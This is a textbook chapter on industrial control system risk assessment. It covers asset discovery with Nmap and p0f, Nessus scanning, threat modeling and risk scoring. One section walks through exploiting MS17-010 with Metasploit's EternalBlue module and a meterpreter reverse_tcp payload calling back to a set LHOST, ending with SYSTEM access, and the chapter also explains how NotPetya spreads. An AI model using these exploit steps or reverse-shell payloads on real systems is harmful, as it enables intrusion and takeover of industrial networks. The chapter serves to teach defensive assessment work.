Chapter 15 Industrial Control System Risk Assessments
In this chapter, we are going to get into the details of Industrial Control System (ICS)
risk assessments. We will start the chapter off with a short discussion of how objectives
and approaches differ between Information Technology (IT) and ICS cyber attacks.
After that, we will explore the different approaches and techniques behind IT system
risk assessments before we look at the added complexity of conducting ICS-specific
assessments. At the end of this chapter, you should have a good understanding of what is
involved in conducting ICS-specific risk assessments.
We will cover the following topics in this chapter:
• Understanding the attack stages and ultimate objectives of ICS cyber attacks
• Risk assessments
• Asset identification
• System characterization
• Vulnerability identification
• Threat modeling
• Risk calculation
• Risk mitigation prioritization
Figure 15.1 – The two phases of the ICS cyber kill chain
Stage 1 involves gaining access to the ICS network in any way possible. This typically
means gaining a foothold in the enterprise network and then pivoting into the industrial
network from there; these are the two main objectives of the first stage of the ICS attack
scenario. Stage 1 of the attack needs to be completed successfully before the second
stage can begin. Stage 2 involves the ICS exploitation part of the attack, where activities
necessary to achieve the ultimate attack objective are carried out. Attack objectives can
include stealing sensitive data, disrupting production, or something more sinister such as
causing physical damage to equipment. What all this means is that an ICS attack scenario
can involve several attacks and corresponding objectives, depending on the stage the ICS
attack is in. This scenario differs from a regular IT attack where the objective is achieved
by completing stage 1 activities or is part of stage 1 activities. The following example
illustrates this key difference between IT and OT/ICS cyberattacks:
Risk assessments
The business dictionary defines risk assessment as "The identification, evaluation, and
estimation of the levels of risks involved in a situation, their comparison against benchmarks
or standards, and determination of an acceptable level of risk." In other words, risk
assessments are about discovering all the things that can go wrong in a certain situation,
such as the setup of a system, and the likelihood that things will go wrong and what the
impact will be when things do go wrong.
Given this explanation, let's look at a definition of risk. The authors of the book Hacking
Exposed Industrial Control Systems gave one of the most complete descriptions of risk
that I have encountered:
"Risk is the likelihood that a threat source will cause a threat event, by means of a threat
vector, due to a potential vulnerability in a target, and what the resulting consequence and
impact will be."
Let's look closer at this description:
• A threat source is the initiator of the exploit, the attacker or threat actor.
• A threat event is an act of exploiting a vulnerability, or an attack on the system
under consideration (SUC).
• A threat vector is the avenue of attack or the delivery method of the exploit, such
as using an infected thumb drive or using a phishing email to deliver a malicious
payload.
• A vulnerability is a flaw in the SUC, such as a misconfigured service, an easily
guessed password, or a buffer overflow programming error in an application.
• Likelihood is the chance that a discovered vulnerability will be exploited and result in a threat event.
• A target is the SUC.
• A consequence is the direct result of a successful threat event, such as the crashing
of a service or the installation of a malicious program.
• The impact is the effect on the operations, image, or financial welfare of the victim
company.
So, a risk assessment will show you what vulnerabilities lurk in the SUC, what the chances
are of these vulnerabilities being exploited, and what the results are for the system and
the company that owns the system. The result of a risk assessment is a risk score for a
discovered vulnerability. The score takes into consideration all the factors that define
risk with the following equation:
There is a lot of difference in the quality of risk assessments when it comes to the
calculation of the likelihood. The likelihood score gives insight into the chances that
the discovered vulnerability will be exploited and cause a threat event. This is where
the different parts and methods of a risk assessment come into play. From a high-level
perspective, the following three sets of activities should take place in a risk assessment:
Asset identification and system characterization:
• These activities involve the discovery of all the assets of the SUC, determining their
criticality and the asset value, which is used for impact calculation.
• The outcome of this step is a list of potential targets.
Vulnerability identification and threat modeling:
• This step involves discovering any potential vulnerabilities within the discovered
assets and their associated CVSS scores for the severity calculation.
• This step involves using threat modeling techniques to add threat source, threat
vector, and threat event information.
• This step also assesses the likelihood and consequence of a compromise.
• The outcome of this step will be a listing of risk scenarios, made relevant and
actionable for the SUC.
Risk calculation and mitigation prioritization:
• This step involves assessing the total impact of a threat event for each discovered
target's vulnerability.
• Combining all the discovered information, this step calculates the risk score.
• The outcome of this step will be an actionable risk scoring per vulnerability that
helps strategize remediation efforts.
Note
Where does a gap analysis fit into all this? A gap analysis is often mistaken for
a risk assessment; a gap analysis only looks for all the mitigation controls in
place for the SUC. It then compares those controls to some predefined list of
recommended controls. The difference between the two is the discovered gaps.
A gap analysis doesn't take any likelihood, impact, or severity calculation into
account. It just shows whether the system is using generally recommended
mitigation controls. Gap analyses are often used to comply with regulatory
requirements. They do not add any real security. A gap analysis should be part
of a risk assessment; it should not be considered the risk assessment.
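To make the comparison at the heart of a gap analysis concrete, here is a minimal sketch that treats it as a set difference. The control names and the find_gaps helper are hypothetical and only serve as illustration; a real gap analysis would take its list of recommended controls from the standard or regulation being applied.

```python
# Hypothetical control names, used only to illustrate the comparison.
RECOMMENDED = {
    "network segmentation",
    "application whitelisting",
    "centralized logging",
    "tested backups",
}
IMPLEMENTED = {"network segmentation", "tested backups"}


def find_gaps(recommended, implemented):
    """Return the recommended controls that are not in place, sorted by name."""
    return sorted(set(recommended) - set(implemented))


print(find_gaps(RECOMMENDED, IMPLEMENTED))
```

Notice that nothing in this comparison says how likely or how damaging the absence of a control is, which is exactly why a gap analysis on its own is not a risk assessment.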
Asset identification
The asset identification process will typically start with the reviewing of existing
documentation such as IP and asset lists, software and hardware inventory
documentation, and asset management systems in order to compile a list of assets and
their IP addresses. The objective here is to find all the assets of the SUC. If performed
cautiously and during production downtime, the discovery of additional assets or the
verification of assets found during documentation review can be accomplished with network
scanning tools, by running ping sweeps and ARP scans. To illustrate these two scan
methods, consider the following scan example, performed with our trusted friend Nmap.
The Nmap command nmap -sP 172.20.7.0/24 runs a ping sweep (-sP, named -sn in newer
Nmap releases) of the 172.20.7.0/24 subnet, which comes down to sending an ICMP echo
(ping) request to each address in the range we specified.
If we are interested in only showing discovered IP addresses from the scan, we can filter
out just the IP addresses by piping the Nmap results through awk (awk is a
domain-specific language designed for text processing; it is typically used as a data
extraction and reporting tool and is a standard feature of most Unix/Linux OSes).
Looking at the command nmap -sP 172.20.7.0/24 -oG - | awk '/Up$/{print $2}', we run an
Nmap ping sweep scan (nmap -sP) with the output displayed as a greppable string (-oG -)
and pipe the results (|) into awk, which will display only the IP addresses of hosts that
are up (awk '/Up$/{print $2}'). Additionally, we could redirect (>) the output of this
command into a file, so we keep a record of all the IP addresses we found for later use.
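The same filtering can also be done in a script, which is handy when the results feed other tooling. The following is a minimal sketch, assuming the greppable Nmap output has already been captured as text. The hosts_up name and the sample lines are illustrative and made up; they are not part of Nmap.

```python
def hosts_up(greppable_output):
    """Return the address of every host that a greppable Nmap report lists as Up."""
    addresses = []
    for line in greppable_output.splitlines():
        # Same test as awk '/Up$/{print $2}': the line ends in "Up",
        # and the second whitespace-separated field is the address.
        if line.endswith("Up"):
            fields = line.split()
            if len(fields) >= 2:
                addresses.append(fields[1])
    return addresses


# Made-up sample in the shape of greppable (-oG) ping sweep output.
SAMPLE = "\n".join([
    "# Nmap scan header line (ignored by the filter)",
    "Host: 172.20.7.61 ()\tStatus: Up",
    "Host: 172.20.7.94 ()\tStatus: Up",
    "# Nmap done (summary line, ignored by the filter)",
])

print(hosts_up(SAMPLE))
```

Keeping the parsing separate from the scan itself means the function can be run against saved scan output, without touching the network again.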
Although I have run many of these scans on a variety of industrial networks and have
never seen any serious issues resulting from doing so, I am still going to caution you
to be very careful when performing network scans in the ICS environment. Devices
on OT or ICS networks are often more sensitive to active scanning techniques. Some
older devices can buckle from a single ping packet and many OT devices will suffer
performance degradation when more intense port scanning is performed on the network.
Compounding the issue is the fact that the uptime requirements for OT/ICS networks
and attached devices are many times higher than for regular IT networks. Where on a
regular IT network it is okay to restart a Domain Name System (DNS) or Dynamic
Host Configuration Protocol (DHCP) server, on OT networks this kind of action can
be disastrous. Processes relying on and running over OT networks often include many
devices, and most of the time if one of those devices fails, the entire process fails. To make
things worse, ICS failures often result in safety-related incidents, and lives might be on the
line in certain situations.
For these reasons, it is not recommended to do any type of active scanning on live or
in-production OT/ICS networks. Instead, passive scanning techniques and tools should be
considered. One such tool is p0f (https://lcamtuf.coredump.cx/p0f3/). p0f
does not send out any traffic onto the network it sits on but instead uses network packet
capturing (sniffing) technology to discover live systems on the network. p0f is only as
effective as the traffic it sees, so if it cannot capture packets sent from a system, it will not
report on the system. The following is an example output from the p0f command, piped
through awk to filter out IP addresses only:
Note
The preceding example only shows a single IP because that is the only one on
the network segment that this computer is attached to.
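If p0f is left running for a longer period, its log can be mined for addresses in the same spirit. The sketch below rests on two assumptions: that p0f was started with its -o option so that it writes a log file, and that the log uses the pipe-delimited cli=address/port and srv=address/port fields described in the p0f version 3 README. The observed_hosts name and the sample lines are made up for illustration.

```python
import re

# Matches the cli=ADDRESS/PORT and srv=ADDRESS/PORT fields of a p0f log line.
ENDPOINT = re.compile(r"\b(?:cli|srv)=([0-9a-fA-F.:]+)/\d+")


def observed_hosts(log_text):
    """Return the sorted, de-duplicated addresses seen as client or server."""
    return sorted(set(ENDPOINT.findall(log_text)))


# Made-up sample lines in the assumed p0f log format.
SAMPLE_LOG = "\n".join([
    "[2021/03/01 09:15:02] mod=mtu|cli=172.20.7.61/49152|srv=172.20.7.94/102"
    "|subj=cli|link=Ethernet or modem|raw_mtu=1500",
    "[2021/03/01 09:15:09] mod=mtu|cli=172.20.7.67/49170|srv=172.20.7.94/102"
    "|subj=cli|link=Ethernet or modem|raw_mtu=1500",
])

print(observed_hosts(SAMPLE_LOG))
```

Because the addresses come from captured traffic only, a device that stays silent during the capture window will not show up in the result.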
The following figure gives an example of an assets list with IP address, OS/firmware/
software versions and revisions, and device details:
Note
Creating a comma-separated list with only the IP addresses makes for a handy
import in most automated scanning tools later in the process.
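A comma-separated list like this can be generated straight from the asset list. The following is a minimal sketch, assuming each asset is held as a dictionary with an "ip" key (a hypothetical layout, not a format prescribed by any scanning tool) and that all addresses are IPv4.

```python
import ipaddress


def ip_list(assets):
    """Return the unique asset addresses as one comma-separated string.

    Addresses are validated with the ipaddress module (a malformed address
    raises ValueError) and sorted numerically rather than alphabetically.
    """
    unique = {ipaddress.ip_address(asset["ip"]) for asset in assets}
    return ",".join(str(address) for address in sorted(unique))


# Hypothetical asset records; only the "ip" key is used here.
assets = [
    {"name": "asset-a", "ip": "172.20.7.94"},
    {"name": "asset-b", "ip": "172.20.7.9"},
    {"name": "asset-c", "ip": "172.20.7.61"},
    {"name": "asset-c (second entry)", "ip": "172.20.7.61"},
]

print(ip_list(assets))
```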
Now that we have discovered our assets of concern, we will continue with the
characterization of the system they are part of.
System characterization
Now that we have a list of target assets, we need to characterize the discovered assets,
identify the systems they belong to, and identify functional aspects such as installed
software and any subsystems that might be present. We also need to evaluate the
importance of the asset or system to the overall process and other characterizing details
such as when maintenance was last performed or when the last system failure was –
anything that will help the risk assessment in evaluating the impact and likelihood of the
asset or system being compromised or failing.
During this process, it helps to think of issues such as the time it would take to rebuild
a system from scratch and the effect on upstream or downstream equipment in the case
of system or asset failure. Figuring out the maximum acceptable time for a system to be
down before the entire process must be stopped (known as the recovery time objective or
RTO) helps as well. In the end, we need to get a clear understanding of the function and
importance of the asset or system in the overall (production) process.
The data that needs to be gathered during these activities comes from asset owner
interviews, documentation review, round table exercises with production and engineering
personnel, and discussions with supervisors and managers of the production line.
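One way to keep the gathered details comparable is to record them in a fixed structure per asset. The sketch below is only an illustration: the field names, the 1 to 5 criticality scale, and all the numbers are assumptions made for this example, not values from the chapter's assessment.

```python
from dataclasses import dataclass


@dataclass
class CharacterizedAsset:
    name: str
    function: str
    criticality: int      # assumed scale: 1 (low) to 5 (process stops without it)
    rto_hours: float      # longest downtime the process can tolerate
    rebuild_hours: float  # estimated time to rebuild the asset from scratch

    def recovery_shortfall(self):
        """Hours by which a rebuild would overrun the RTO (0 if it fits)."""
        return max(0.0, self.rebuild_hours - self.rto_hours)


def rank(assets):
    """Order assets by criticality first, then by largest recovery shortfall."""
    return sorted(assets, key=lambda a: (-a.criticality, -a.recovery_shortfall()))


# Hypothetical values for illustration only.
assets = [
    CharacterizedAsset("Historian", "process data storage", 4, 24.0, 12.0),
    CharacterizedAsset("WS100-West", "engineering workstation", 4, 8.0, 16.0),
    CharacterizedAsset("Siemens S7-400 PLC", "process control", 5, 1.0, 4.0),
]

for asset in rank(assets):
    print(asset.name, asset.recovery_shortfall())
```

An asset whose rebuild time exceeds its RTO is a natural candidate for spare hardware or tested backups, which is the kind of insight the interviews and round table exercises are meant to surface.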
After completing the characterization activities, the following is the updated asset list
for the chapter's example assessment:
Threat intelligence is general threat information that has been correlated and processed
so that it is of operational value to the organization and the SUC it was gathered
for. Threat intelligence has actionable value to a company because the non-relevant threats
and information are stripped and eliminated. The threat modeling process will cut out
non-relevant information and, when done correctly, will help provide a more streamlined
and efficient mitigation process later in the assessment process, giving a better return
on investment for cybersecurity spending. At a high level, threat modeling will correlate
up-to-date threat information with the vulnerabilities discovered for the list of targets
found in the previous step.
The activities in this step can be divided as follows:
Discovering vulnerabilities
The first activity in this step is discovering all the vulnerabilities that are lurking in the
SUC. There are two main methods for accomplishing this task: comparison and scanning.
The comparison method takes all the running software, firmware, and OS versions and
compares those to online vulnerability databases, searching for known vulnerabilities.
Some resources to find vulnerabilities include the following:
• https://nvd.nist.gov
• https://cve.mitre.org
• https://us-cert.cisa.gov/ics
• http://www.securityfocus.com
• http://www.exploit-db.com
It must be said that this method is very labor-intensive but carries little to no risk to the
ICS network as no network packets need to be sent and no other traffic needs to be added
to the ICS network to gather the information. The second method involves running a
vulnerability scan with an automated scanning tool such as Nessus
(https://www.tenable.com/products/nessus/nessus-professional) or OpenVAS
(http://www.openvas.org/). The scanning method is faster and much less labor-intensive
but will introduce lots of traffic to the ICS network and, depending on the type
of scan, can have negative effects on ICS devices.
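Part of the labor in the comparison method can be scripted once the advisory details have been copied into a local list by hand. The following is a minimal sketch under that assumption. The product names, advisory IDs, and version numbers are placeholders invented for this example and do not correspond to real advisories, and real advisories often describe affected versions in ways that need more than a simple "fixed in" comparison.

```python
def parse_version(text):
    """Turn a dotted version such as '6.0.3' into (6, 0, 3) for numeric comparison."""
    return tuple(int(part) for part in text.split("."))


# Placeholder advisory entries, entered by hand from the online databases.
ADVISORIES = [
    {"id": "EXAMPLE-0001", "product": "ExamplePLC 400", "fixed_in": "6.0.6"},
    {"id": "EXAMPLE-0002", "product": "ExampleHMI", "fixed_in": "2.1.0"},
]

# Placeholder inventory, as it would come out of asset identification.
INVENTORY = [
    {"name": "PLC-West", "product": "ExamplePLC 400", "version": "6.0.3"},
    {"name": "HMI-1", "product": "ExampleHMI", "version": "2.1.0"},
]


def match_advisories(inventory, advisories):
    """Return (asset name, advisory id) pairs where the installed version predates the fix."""
    findings = []
    for asset in inventory:
        for advisory in advisories:
            same_product = asset["product"] == advisory["product"]
            if same_product and parse_version(asset["version"]) < parse_version(advisory["fixed_in"]):
                findings.append((asset["name"], advisory["id"]))
    return findings


print(match_advisories(INVENTORY, ADVISORIES))
```

Like the manual comparison, this runs entirely offline against the inventory, so it adds no traffic to the ICS network.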
With the potential of adverse effects on ICS equipment, it is advised to run any type of
active scanning on a test setup or an approximation of the ICS network. If you are lucky
enough to have a test environment or a development setup in your ICS environment,
scanning and probing should be performed in that environment. Most of the time, such
a network setup will not be present, and an approximation must be created. This involves
taking a sample of every model, type, and firmware and software revision that runs on the
production network and getting a spare or extra setup on a test network. OSes and certain
network devices can be virtualized; ICS devices such as controllers and HMIs might
be found in the spares room of the plant. This will effectively create a duplicate of the
production network that can be tested, probed, scanned, and interrogated at will.
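Working out which devices the approximation needs comes down to reducing the asset list to its distinct model and firmware combinations. The following is a minimal sketch, assuming the inventory is a list of dictionaries with "model" and "firmware" keys. The key names and the sample entries are hypothetical.

```python
from collections import Counter


def lab_sample(inventory):
    """Return each distinct (model, firmware) pair with its number of production units."""
    counts = Counter((asset["model"], asset["firmware"]) for asset in inventory)
    return sorted(counts.items())


# Hypothetical inventory entries for illustration.
inventory = [
    {"name": "PLC-1", "model": "Controller A", "firmware": "6.0.3"},
    {"name": "PLC-2", "model": "Controller A", "firmware": "6.0.3"},
    {"name": "PLC-3", "model": "Controller A", "firmware": "5.2.1"},
    {"name": "HMI-1", "model": "Panel B", "firmware": "2.1.0"},
]

for (model, firmware), units in lab_sample(inventory):
    print(model, firmware, units)
```

Each line of the result is one device, or one virtual machine, that the test network needs; the unit count hints at how much of production a finding on that sample would affect.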
This way, you can take a production network like the one shown here:
Figure 15.6 – ICS network approximation – allows safe testing and probing
Let's look at the steps involved in performing a Nessus scan. Follow these instructions to
scan your (lab) environment with the free version of the Nessus vulnerability scanner:
1. To follow along with the exercise, you will need to install the latest version of the
Nessus scanner for Kali Linux, downloaded from
https://www.tenable.com/downloads/nessus?loginAttempted=true, and sign up for a free
(Nessus Essentials) license from
https://www.tenable.com/products/nessus/activation-code.
2. Once the Nessus scanner package is downloaded, open a terminal on the Kali
Linux VM and run the following command:
root@KVM01010101:~/Downloads# dpkg -i Nessus-6.10.8-debian6_amd64.deb
Selecting previously unselected package nessus.
(Reading database ... 339085 files and directories currently installed.)
Preparing to unpack Nessus-6.10.8-debian6_amd64.deb ...
Unpacking nessus (6.10.8) ...
3. This will install the Nessus scanner and take care of any additional requirements
and dependencies. Once the scanner is done installing, run the following command,
as indicated by the installer, to finalize the installation and start the Nessus scanner
service:
root@KVM01010101:~/Downloads# service nessusd start
4. With the scanner service running, open Firefox and navigate to the indicated URL
(note that the URL might be different for your setup):
https://<IP ADDRESS OF KALI>:8834/
5. As part of the initial setup, Nessus will guide you through the process of licensing
the scanner and setting up an administrative user (choose something memorable).
Next, the initial setup process will download updated scanner plugins and direct
you to the initial scanner page:
7. The next screen requires us to enter some basic information, such as a name for the new
scan, where to store it, and what targets to scan:
For this simple example vulnerability scan, we will leave all other settings at their
default values and launch the scan:
10. On the Scan Details page, we can see results for the hosts that we specified to get
scanned through the hosts-ips.txt file:
12. And Nessus will even give us remediation suggestions for the discovered
vulnerabilities, shown under the Remediations tab:
1. We will be using Metasploit from our Kali Linux machine. Log in to the Kali VM,
open a terminal, and run the msfconsole command:
root@KVM01010101:~# msfconsole
       =[ metasploit v4.14.25-dev                         ]
+ -- --=[ 1659 exploits - 950 auxiliary - 293 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
Matching Modules
================
   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4. Next, we need to set a payload for the exploit to use. We will be using the
meterpreter payload. meterpreter is a Metasploit attack payload that
provides an interactive shell from which an attacker can explore the target machine
and execute code. meterpreter is deployed using in-memory DLL injection. As a
result, meterpreter resides entirely in memory and writes nothing to disk:
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
5. At this point, we need to set the various options needed for the exploit and
payload to work properly. Look at the current options with show options:
Exploit target:
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
6. The only two missing required options are LHOST and RHOST. We need to specify
the IP address of the local host (LHOST), the address the reverse_tcp payload connects back to:
msf exploit(ms17_010_eternalblue) > set LHOST 192.168.1.222
LHOST => 192.168.1.222
9. The exploit succeeded and we now have a meterpreter (chosen payload) session
with the target (192.168.1.200), as the almighty SYSTEM user (the root account
for Windows):
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
On a sparsely updated network, as most ICS environments tend to be, where legacy
systems such as Windows XP and even 2000 are still present, this exploit is extremely
successful and can potentially cause a lot of damage. As a matter of fact, I can still vividly
recall a customer engagement where they were heavily hit by the NotPetya malware.
Initially believed to be ransomware trying to extort victims, it was later discovered
that the NotPetya malware was a wiper, with the purpose of doing as much damage as
quickly as possible. What makes NotPetya extra dangerous is the fact that it not only uses
the SMBv1 vulnerability as a propagation method but also uses two other, legitimate
remote system connection methods. NotPetya can use a well-known system utility
called PsExec.exe, created by Sysinternals
(https://docs.microsoft.com/en-us/sysinternals/downloads/psexec), for connecting to remote
systems with credentials obtained from memory on the compromised system with functionality
such as Mimikatz. The third method of propagation is achieved by using the Windows
Management Instrumentation Command-line (WMIC) interface. With the use of wmic.exe,
NotPetya can copy itself to a remote computer and execute that copy there, by using the
credentials obtained from memory. All in all, the victim can lose control of the ICSes in
half of their plants and the malware can interrupt production for almost a week. With
wiped systems, there are only two options to recover: either from a recent backup where
there is one available or from scratch where there is not.
At this point, we have a list of assets and their discovered vulnerabilities; time to start
thinking of all the ways those vulnerabilities on the assets can be exploited.
Threat modeling
With assets and corresponding vulnerabilities discovered for the SUC, the next activity in
the risk assessment process is to create risk scenarios using threat modeling techniques.
In a way, creating risk scenarios is about trying to predict where a threat is likely going
to strike. This part of the ICS risk assessment differs the most from the regular IT risk
assessment. This is where we will bring together vulnerabilities for IT and OT assets and
decide on the likelihood that they will be exploited based on the (physical) environment
they are in and correlate the impact of a potential exploit to the production process and
the safety of the environment the SUC operates in.
At this point, it is important to know the system or process being evaluated very well.
Creating risk scenarios starts with combining information such as threat sources and
threat vectors to create possible threat events for the vulnerabilities found. For a threat
event to be feasible, the following elements must be present: a threat source to carry out
the event, a threat vector to exploit the vulnerability, and a target with a vulnerability. The
following figure conceptualizes a threat event:
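As a rough code counterpart to this idea, the sketch below builds candidate threat events by pairing every threat source with every threat vector for one vulnerable target and then dropping the pairs judged infeasible. The ThreatEvent structure, the candidate_events helper, and the feasibility rule are assumptions made for illustration; in a real assessment, feasibility is a judgment made with people who know the system.

```python
from dataclasses import dataclass
from itertools import product


@dataclass(frozen=True)
class ThreatEvent:
    source: str         # who carries out the event
    vector: str         # how the exploit reaches the target
    target: str         # the asset under consideration
    vulnerability: str  # the flaw that makes the event possible


def candidate_events(sources, vectors, target, vulnerability, feasible):
    """Pair every source with every vector and keep only the feasible pairs."""
    return [
        ThreatEvent(source, vector, target, vulnerability)
        for source, vector in product(sources, vectors)
        if feasible(source, vector)
    ]


# Illustrative rule: an external hacker is assumed to have no physical access.
INFEASIBLE = {("external hacker", "Physical access")}

events = candidate_events(
    sources=["contractor", "external hacker"],
    vectors=["Business network", "Physical access"],
    target="Siemens S7-400 PLC",
    vulnerability="CVE-2016-9158",
    feasible=lambda source, vector: (source, vector) not in INFEASIBLE,
)

for event in events:
    print(event.source, "via", event.vector)
```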
In general, a threat source can be anything capable of carrying out the threat event, from
internal threat sources such as employees and contractors to external threat sources such
as former employees, hackers, national governments, and terrorists. For a more in-depth
explanation of possible threat sources, refer to the ICS-CERT article here:
https://ics-cert.us-cert.gov/content/cyber-threat-source-descriptions.
A good starting list when considering possible threat sources is the list included in the
NIST SP 800-82 Rev. 2 documentation
(https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final). This resource gives us
adversarial and accidental threat source examples. Possible threat vectors, the avenues a
threat source can use to reach the target, include the following:
• Business network
• ICS network
• Internet
• WAN
• ICSes and devices
• Same-subnet computer systems
• PC and ICS applications
• Physical access
• People (via social engineering)
• The supply chain
• Remote access
• (Spear) phishing
• Mobile devices
At this point, we start combining all possible threat sources that could exploit the
vulnerability in our target with all possible threat vectors, keeping in mind the
feasibility of the threat sources and vectors. The following is an example threat scenario
for a vulnerability in a Siemens S7-400 PLC, discovered by passively comparing the
running firmware revision to the vulnerability database on
https://search.us-cert.gov/search?utf8=%E2%9C%93&affiliate=us-cert&sort_by=&query=siemens+s7-300%2F400+6.1:
Look at the details for the first returned result, the vulnerability under
ICSA-16-348-05/CVE-2016-9158:
We can now create the threat event for the Siemens PLC, taking into consideration the
information we have found so far:
To point out a highly efficient assessment technique, let's extend the chapter's assessment
example to include the Windows 7 workstation with the MS17-010 vulnerability that we
discovered and pointed out in the previous section:
During the asset identification and characterization step, let's say it was discovered
that the Windows 7 workstation was connected to both the business network and the
industrial network (dual-homed) and had, among other software, Siemens Step 7
installed. Because of this, the engineering workstation computer WS100-West now
becomes a threat vector for all Siemens PLCs within the industrial network segment the
computer is connected to.
In the case of the vulnerable Siemens S7 PLC described earlier, the workstation is more
than a threat vector. The vulnerability present on the WS100-West workstation offers an
opportunity to pivot from the business network into the industrial network, so that
computer extends the threat source and threat vector possibilities for the vulnerability
of the Siemens PLC. In other words, because the workstation can be exploited on the
business network and used for pivoting into the industrial network, threat actors
(sources) can now potentially exploit the Siemens PLC, whereas it would normally have
been protected by network segmentation from those attack sources and vectors.
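The effect of such a pivot point can be reasoned about as a reachability question. The following is a minimal sketch that models who can reach what as a small directed graph and walks it with a breadth-first search. The two graphs are simplified assumptions about the example network, not its actual topology.

```python
from collections import deque


def reachable(links, start):
    """Breadth-first search: return every node reachable from start."""
    seen = {start}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for neighbor in links.get(node, ()):
            if neighbor not in seen:
                seen.add(neighbor)
                queue.append(neighbor)
    return seen


# Properly segmented: nothing on the business network leads into the industrial network.
SEGMENTED = {
    "Internet": ["Business network"],
    "Business network": [],
    "Industrial network": ["Siemens S7-400 PLC"],
}

# Same network with the dual-homed, exploitable workstation added as a bridge.
DUAL_HOMED = {
    "Internet": ["Business network"],
    "Business network": ["WS100-West"],
    "WS100-West": ["Industrial network"],
    "Industrial network": ["Siemens S7-400 PLC"],
}

print("Siemens S7-400 PLC" in reachable(SEGMENTED, "Internet"))
print("Siemens S7-400 PLC" in reachable(DUAL_HOMED, "Internet"))
```

Every node that gains a path to the PLC once the workstation is added is a threat source or vector that now has to be considered for the PLC vulnerability.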
Correlating known vulnerable systems to other parts of the SUC allows for creating more
realistic threat events, adding actionable value to the risk scenarios built from those threat
events. Actionable and relevant risk scenarios help strategize mitigation efforts and allow
for the efficient use of a tight security budget.
The following figure illustrates a risk scenario:
Creating risk scenarios from threat events is done by adding plausible attacker motives/
objectives and the possible consequences when a threat event is realized. Plausible
objectives and consequences are highly dependent on the industry sector the ICS is in,
the business objectives, and the environmental situation of the ICS. The following lists are
starting points for possible objectives and consequences, gathered from online sources
such as https://www.msec.be/verboten/presentaties/presentatie_gc4_attack_targets.pdf.
The lists are sorted by asset and system type. These lists
should be adjusted to and rationalized for the industry sector your ICS is in, the business
objectives of the ICS owner, and the surrounding environment of the ICS. Information
such as the geographical location of the ICS and the placement of the ICS network within
the overall company network architecture are relevant factors that could dictate whether
theorized threat events are plausible.
The following table shows a starting list of possible objectives per asset type:
The following table shows a starting list of possible ICS consequences per compromised
asset type:
Note
Another great resource that can help with threat modeling is the ICS adversary
Tactics, Techniques, and Procedures (TTPs) described in the MITRE ATT&CK framework
for Industrial Control Systems: https://collaborate.mitre.org/attackics/index.php/Main_Page.
By adding the objectives and consequences to this chapter's example threat events, we can
create the following risk scenario:
We just created a risk scenario matrix where we correlated various findings in a way that
allows us to assess the discovered vulnerabilities quickly and accurately around an asset or
system. Next, we are going to assign some values to the risks we have uncovered to create
a comparative scoring that will allow us to effectively prioritize mitigation efforts.
This gives the following risk score calculation for the Siemens S7-400 PLC vulnerability:
Figure 15.23 – Risk calculation for the Siemens S7-400 PLC vulnerability
The resulting score allows easy comparison between all discovered vulnerabilities. Because
we performed the assessment objectively and with the overall SUC in mind, the score that
is calculated is an unbiased, all-inclusive indicator of which asset or system poses the
most risk to the overall process. At this point, the assessment results can be
easily compared when planning mitigation strategies. A vulnerability resulting in a risk score of
eight will need more attention than one with a score of six.
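To show how comparative scores drive prioritization, here is a minimal sketch. It is not the chapter's risk equation: it assumes, purely for illustration, that severity, criticality, likelihood, and impact are each expressed on a 0 to 10 scale and combined as a plain average. The risk_score and prioritize names and all the input values are hypothetical.

```python
def risk_score(severity, criticality, likelihood, impact):
    """Average four 0-10 factors into one 0-10 score, rounded to one decimal.

    The equal weighting is an assumption of this sketch, not a standard.
    """
    factors = (severity, criticality, likelihood, impact)
    for value in factors:
        if not 0 <= value <= 10:
            raise ValueError("each factor must be between 0 and 10")
    return round(sum(factors) / len(factors), 1)


def prioritize(findings):
    """Return (name, score) pairs, highest risk first."""
    scored = [(name, risk_score(*factors)) for name, factors in findings.items()]
    return sorted(scored, key=lambda item: item[1], reverse=True)


# Hypothetical factor values: (severity, criticality, likelihood, impact).
findings = {
    "finding B": (6.0, 5, 6, 7),
    "finding A": (8.0, 9, 6, 9),
}

for name, score in prioritize(findings):
    print(name, score)
```

Whatever formula is used, it should be applied identically to every finding, because the scores only have meaning relative to each other.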
Summary
In this chapter, we looked at risk assessments in general and performed an example risk
assessment for an ICS environment. During the process, we discovered the assets in play,
their specifics, and their importance in the overall process (know what you have), and we
intelligently looked at all the possible ways things can go wrong with the discovered assets
(know what is wrong with what you have). By calculating a highly actionable risk scoring
for each discovered risk instance, we are now in a position to effectively spend our security
budget on controls that have the biggest impact, securing the assets we need the most.
By now, you should be well versed in the art of performing risk assessments for the ICS
environment. As with everything, practice makes perfect, but you now have a great
starting point.
In the next chapter, we will look at a different type of security assessment, the red team
versus blue team exercise.